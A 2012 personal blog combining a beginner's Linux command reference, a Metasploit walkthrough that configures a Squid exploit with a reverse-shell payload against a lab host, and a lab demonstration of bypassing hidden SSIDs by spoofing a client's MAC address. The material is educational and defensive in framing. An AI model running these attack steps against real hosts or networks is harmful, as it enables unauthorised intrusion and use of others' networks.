Friday, 18 May 2012

Basic Linux Commands

The purpose of this blog entry is to document a few basic Linux commands that i find useful. I'm fairly new to Linux and recording these commands gives me a point of reference and helps me remember them.

It's important to note that in Linux syntax is case sensitive.

I am using Ubuntu so my syntax may differ slightly to yours if you are using another distro. If you want to learn more about any of the commands i list try the following:

man command (e.g man ls)

or

command -h

or

command --help


The sections i have added so far are:

1. Users
2. Navigation
3. Files
4. Networking
5. Hardware
6. System Tools


I will add to this document as i learn more commands.



1. Users

To add a new user called bob:

adduser bob

To switch to a new user called bob:

su bob

To change bobs password:

passwd bob

To switch straight to root:

su

To run a command as root whilst logged in as another user:

sudo command

* this assumes you are in the sudo group.

To view which user you are currently logged in as use:

whoami


2. Navigation

To list directories use:

ls

To list all directories including hidden and permissions use:

ls -la

To list all directories in another folder use the following syntax:

ls -la /home/bob/

In the output anything preceded with a . is hidden.


To change directory use:

cd directory_name

Or the path:

cd /etc/directory_name

To move back in the directory structure use:

cd ..

or

cd ../..

To navigate directly to the root / directory:

cd /

To navigate directly to your home directory:

cd #

To print the current directory use:

pwd


3. Files

To view the contents of a file:

cat filename.txt

To delete a file:

rm filename.txt

To delete all files and directories and sub-directories (without prompting)

rm -Rf directory_name

To locate a file:

locate filename.txt

To change the owner of a file use:

chown bob filename.txt

To change the group ownership as well use:

chown bob:users_group filename.txt

To create a directory use:

mkdir mydirectory

To create a file use:

touch myfilename

To move or rename a file use:

mv file1 file2

To copy a file to bobs home directory use:

cp file1 /home/bob/


4. Networking

To obtain a DHCP address (on all interfaces):

dhclient

Or on just one particular interface:

dhclient eth1

To view the interface network properties:

ifconfig

To set the IP address of a interface:

ifconfig eth1 192.168.1.100/24

To change the MAC address of an interface:

ifconfig eth1 hw ether 11:22:33:44:55:66:77:00

To put an interface into promiscuous mode:
ifconfig eth1 promisc

To take an interface out of promiscuous mode:

ifconfig eth1 -promisc

To view the wireless interface settings:

iwconfig

To set the wireless interface to a particular wireless AP:

iwconfig eth1 essid my_wireless_network

To set the wireless interface to managed mode:

iwconfig eth1 mode managed

To set a wireless interface to monitor mode (for sniffing etc..)

iwconfig eth1 mode monitor

To configure WEP encryption on a wireless interface:

iwconfig eth1 enc {enc key}

To configure a wireless interface to use a particular channel:
iwconfig eth1 channel 3

To view the routing table:

route

To view the routing cache:

route -C

To set a static route to a network:

route add -net 172.16.1.1 netmask 255.255.0.0 dev eth1

To set a static route to a host:

route add -host 80.127.23.65 eth1

To delete a route:

route del -host 80.127.23.65 eth1

To add a default gateway of 192.168.1.1:

route add default gw 192.168.1.1


Tracerouting in linux uses UDP packets as oppose to Windows using ICMP.

To traceroute to a target (yahoo in my example) use:

traceroute www.yahoo.com

Another really cool program i found on my system for tracerouting and providing really useful diagnostic info is mtr:

mtr www.yahoo.com

Bear in mind that unlike traceroute mtr use ICMP echo requests.

To list all network connection (external):

netstat -punta

To list network statistics:

netstat -s

To list statistics on an interface:

netstat -i eth1

For a continuous listing on any netstat commands add -c to the command:

netstat -punta -c


To list any IPTables rules:

iptables -L -v

To quickly add a rule to drop ICMP requests:

iptables -A OUTPUT -p icmp -d 0/0 -j DROP

The above command appends (-A) a rule to the output (OUTPUT) chain telling it that ICMP (-p ICMP) from any destination (-d 0/0) should be dropped (-j DROP)

To remove your rule you can use the command:

iptables -F OUTPUT

To flush all rules use:

iptables -F

To remove any currently active rules:

iptables -X

The following rules can be used to rate limit connections to prevent brute-force login to port 21 (for FTP)
iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent \
  --set

iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent \
 --update --seconds 60 --hitcount 4 -j DROP
Using the rule above will drop any more than 3 connection attampts in 60 seconds from the same IP address.


(I will post a blog article on iptables rules)


Or to block icmp you could run or script the following command:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

The default is 0, to to revert it back use:

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

To use a capture network traffic:

ifconfig eth1 promisc
tcpdump -i eth1 -vv


All the above commands assume the interface is eth1. If you are unsure which is your wireless interface run iwconfig and look for the interface with the wireless extensions.



5. Hardware

To list installed hardware (available on ubuntu):

lshw

To list all PCI devices:

lspci

To list all USB devices:

lsusb

To list the loaded modules

lsmod

Another useful trick i have found relating to hardware, is when i attach a new USB HDD and i am unsure of the what it will be called, i attach the device and then immediately look at /var/log/messages for the last entries. This usually gives me what i need. The tail command is useful here.

tail -n 10 /var/log/messages

This will display the last 10 lines of the log file.

To use tail and have it update (-s 2 will update every 2 seconds) as the log updates use the following command:

tail -n 10 -s 2 -f /var/log/messages

Running the dmesg command will also reveal useful information about hardware.


6. System Tools

To view free disk space use:

df -h

To view disk usage on the system use:

du

du can also specify a directory:

du /home/bob/

A useful tool for viewing running processes is top:

top

or for a more interactive version:

htop

You can also use ps to view process information.

To view a list of all running processes:

ps aux

To view a list of processes by a particular user (bob):
ps U bob

To view process in a tree:

ps -eH

To kill a process by it's PID (example of 28556):

kill 28556


Mounting Disks

To view a list of currently mounted file systems view /etc/mtab or use:

mount -L

To mount a disk first create a folder which you will mount it to:
mkdir /media/usb

mount - t ntfs /dev/sdb /media/usb

To unmount a disk:

umount /media/usb

Metasploit Basics

I have recently started to use Metasploit, primarily the msfconsole, and in this blog entry I want to list some of the commands I used to get up and running with the basics. Although Metasploit includes an excellent set of pdf's in the documentation folder I found that by going through the steps listed below I really gained an understanding of the usage of the msfconsole and the uses of the msfconsole.

Metasploit is an exploitation framework that is open source and very extensible. It uses modules for exploits, payloads, auxiliary tools, encoders and nops. At the time of writing this blog entry there are 269 remote code exploits and more can be added from additional sources or created. These exploits can target platforms such as Windows, Linux, Cisco, the iphone and several 3rd party applications.

Below I will list a few basics that I found useful when finding my way around Metasploit and I will end the post by demonstrating an attack on a host and then looking at the host for some signs of the attack.


Tools
  • Metasploit 3.1
  • nmap


The Basics

1. I downloaded the latest version of Metasploit from the website. I also grabbed a version using svn just encase there were any additional modules.

svn co http://metasploit.com/svn/framework3/trunk/

2. I renamed the trunk to metasploit3.1 (this is just to make things tidier).

3. Although I could have used the web based GUI i wanted to get to grips with the console instead. I launched ./msfconsole and was greeted by the banner which lists the amount of modules included.



4. From the prompt ? will list the available options.



5. From within the console I typically use the following commands:

show all

This will show me expolits, payloads, auxiliary tools, encoders, NOP generators. If I want to view just one section I can pick the specific option, such as:

show exploits

Within the list of exploits I may see one that looks interesting and I want to know a little more about it. Now i will use the "info {exlpoit name} to get further information on what the exploit does and what options I will need to configure.

info windows/smb/psexec



Note: Tab completion works well within Metasploit, as does copy and paste.

6. Looking at the Basic options I can see that some are required and some are not. Also, some options are populated, these can be left or changed using the "set" and "unset" commands.

I can set these options as well as others in the global datastore (using the setg command), or the module datastore (using the set command). The difference being that global datastore settings can be used for different modules and may save time.

Below I set the global datastore up for some common variables and then verify them using "setg"

setg LHOST 192.168.1.204
setg LPORT 4445

setg



7. If I want to search the modules or exploits within Metasploit for a particular string I use the "search" command. Below I search for MSSQL.

search MSSQL




6. After selecting an exploit for a vulnerable target I will want to choose a payload. Payloads are what you want to happen once your target is exploited, so do you want a remote shell? a VNC session? Do you want to add a user? Do you want to upload a tool?

To show all payloads I use the command:

show payloads

I see a list of the available payloads for this exploit on this platform. If had wanted to see all payloads I could have used the "back" command to come out of the exploit and then the "show payloads" to view all payloads, however in this case I just want to view payloads that I can use for my chosen exploit.

I have a pretty good idea which one I want but i use info again to see if it does what I want it to do.

info linux/x86/shell/reverse_tcp



If I'm satisfied that th exploit is what I need I would then use the command below to select the payload:

use payload linux/x86/shell/reverse_tcp


Auxiliary tools

As well as payloads and exploits another useful set of modules are the Auxiliary Tools. These encompass tools such as scanners, Fake Wifi AP's, SQL scanners etc..

These can be viewed using the "show auxiliary" command.



Auxiliary tools can be selected using the "use {auxiliary-tool-name}" command and then options can be viewed and set using the "show options" and "set" commands.

Below is an example of choosing an auxiliary tool, viewing the options, setting the required options and then running the tool against a web server.

use scanner/http/version
show options
set RHOSTS 192.168.1.5
show options
exploit


Okay. Lets put some more of this together.


Squid Attack

In the example below I will simply cover the steps to locate and attack a host.

1. Locate my target and scan using nmap.



I see that my target is a Linux host and i can see the services that it has running and are accessible.

2. I search Metasploit for what Linux modules it has.

search linux



I can see from the output that it has an exploit for squid. Well thats handy because my target is running squid on port 3128.


3. I'll now set choose the squid exploit and set my variables and then verify them.

use linux/proxy/squid_ntlm_authenticate
setg RHOST 192.168.1.203
setg RPORT 3128
setg LHOST 192.168.1.204
set



4. Now I want to choose and configure my payload. Using the "show payloads" command now will display compatible payloads for the exploit i have chosen. And as I'm not quite sure which payload I want I'll use the "info" command.

show payloads
info linux/x86/shell_reverse_tcp




5. This is the payload I want, so i select it and I can see that I have set all the variables I need from looking at the options.

set payload linux/x86/shell_reverse_tcp
show options




6. Now i'm happy with my settings I fire my exploit and see how it goes.

exploit



My exploit failed. lets look at why and what I could have done differently or how I could have foreseen the failure and maybe not launched a pointless attack at all.


What Went Wrong

1. Taking a close look at the squid version reveals that my target is using Squid webproxy 2.6.STABLE14.

nmap 192.168.1.203 -T 5 -sV -p 3128




2. If I had taken the time to closely look at the exploit I want to launch I would have used the "info" command.

info linux/proxy/squid_ntlm_authenticate



Looking at the references section on the info a number of links are provided. If I had taken the time to follow these links and examine the information I would have seen that the version of squid that I launched my exploit at is not vulnerable.


3. Now if I was a good admin and I was monitoring my logs I would see that I have had some sort of attack launched at me. This then puts me on my guard.

Below is a sample from the squid logs.

cat /var/log/squid/access.log



As an attacker I do not want to alert an admin just because I didn't read up on the details of an exploit.


Links

Bypass Hidden SSID & MAC Address Filtering

Bypass Hidden SSID & MAC Address Filtering

The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.

Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.

Tools
  • Kismet

The Attack

1. I first use kismet to look at the wireless networks within range.



My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.

At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:

iwconfig eth1 essid batman

Then I would try to obtain an IP address using:

dhclient eth1

The request for an IP Address would fail as the WAP is filtering MAC addresses.


2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.



I see an active client is using the MAC of 00:16:6F:4D:AE:8C

I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.


3. I check my current wireless card config using ifconfig



Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.


4. I now want take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:

ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman



I verify the output of these commands with ifconfig and iwconfig as i go along.


5. I now request an IP address from the DHCP server on the WAP using:

dhclient eth1



I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)

If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.


7. I now test connectivity to the web using ping:

ping www.yahoo.com



my ping works, this tells me I have web access and DNS is working correctly.


Conclusion

Hopefully this demonstration has proven to you how simple it is for an attacker to bypass some of the more basic restrictions. Don't rely on a hidden SSID or MAC Address filtering as your only security measures. They may stop the average neighbor from using your internet connection but they will not prevent an attacker from breaking into your network and using your internet connection.